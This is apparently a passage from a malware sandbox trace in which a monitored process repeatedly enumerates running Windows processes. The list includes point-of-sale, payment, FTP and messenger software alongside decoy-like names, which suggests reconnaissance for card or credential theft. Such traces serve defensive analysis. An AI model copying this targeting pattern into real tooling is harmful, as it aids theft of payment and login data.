th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0207.189] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0207.191] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0207.193] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0207.195] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0207.197] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0207.199] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0207.201] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0207.207] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0207.209] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0207.210] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0207.212] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0207.214] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0207.216] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0207.218] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0207.220] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0207.222] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0207.224] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0207.226] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0207.228] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0207.230] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0207.232] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0207.233] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0207.235] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.238] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0207.240] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0207.241] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.246] Process32Next (in: hSnapshot=0x20a4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0207.248] CloseHandle (hObject=0x20a4) returned 1 [0207.248] Sleep (dwMilliseconds=0x64) [0207.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20fc [0207.403] Process32First (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.406] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0207.408] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0207.411] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.413] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0207.416] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0207.418] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0207.421] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0207.464] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0207.466] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.469] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.472] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0207.475] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.477] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.479] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.481] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.484] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.486] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.489] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.491] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0207.494] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0207.496] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0207.498] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0207.540] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.544] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0207.547] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0207.550] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0207.552] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0207.554] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0207.556] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0207.559] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.561] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.564] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0207.566] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.568] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0207.570] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.572] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.575] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0207.644] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0207.647] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0207.654] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0207.656] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0207.658] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0207.660] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0207.661] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0207.663] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0207.665] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0207.667] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0207.669] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0207.671] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0207.672] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0207.674] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0207.676] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0207.678] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0207.679] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0207.681] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0207.721] Process32Next (in: hSnapshot=0x20fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, 